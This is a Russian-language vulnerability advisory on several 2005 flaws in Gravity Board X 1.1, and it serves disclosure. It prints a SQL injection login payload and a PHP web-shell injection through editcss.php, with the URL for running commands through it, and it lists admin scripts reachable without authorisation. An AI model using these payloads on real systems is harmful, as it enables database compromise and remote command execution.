SQL-инъекция и выполнение произвольных команд в Gravity Board X

Дата публикации:
09.08.2005
Всего просмотров:
1090
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-2562
CVE-2005-2563
CVE-2005-2564
CVE-2005-2565
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Неавторизованное изменение данных
Обход ограничений безопасности
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Gravity Board X (GBX) 1.x
Уязвимые версии: Gravity Board X 1.1

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольные SQL команды в базе данных приложения, выполнить произвольные PHP команды на системе.

1. SQL-инъекция возможна из-за недостаточной проверки входных данных в параметре 'login'. Удаленный пользователь может послать специально сформированный запрос и выполнить произвольные SQL команды в базе данных приложения. Пример:

login: ' or isnull(1/0) /*
password: whatever
2. Удаленный авторизованный администратор может внедрить произвольный HTML сценарий в шаблон и произвести XSS нападение.

3. Уязвимость существует в сценарии 'editcss.php'. Удаленный пользователь может внедрить в шаблон произвольный PHP сценарий и выполнить его во время загрузки страницы с привилегиями web сервера. Пример:

http://[target]/[path]/editcss.php?csscontent=</style>
<?php%2 0system($HTTP_GET_VARS[cmd]);%20?>
Выполнение команд будет возможно с помощью URL:
http://[target]/[path]/index?cmd=[command]
4. Удаленный пользователь может получить данные роб установочной директории приложения, обратившись непосредственно к следующим сценариям:
http://[target]/[path]/deletethread.php?perm=1
http://[target]/[path] /ban.php
http://[target]/[path]/addnews.php
http://[target]/[path]/banned.php
http://[target]/[path]/boardstats.php
http://[target]/[path]/adminform.php
http://[targ et]/[path]/forms/admininfo.php
http://[target]/[path]/forms/announcements.php
http://[target]/[path]/forms/banform.php

URL производителя: www.gravityboardx.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Gravity Board X Input Validation Hole Permits SQL Injection and Authentication Flaw Lets Remote Users Execute Arbitrary Code

или введите имя

CAPTCHA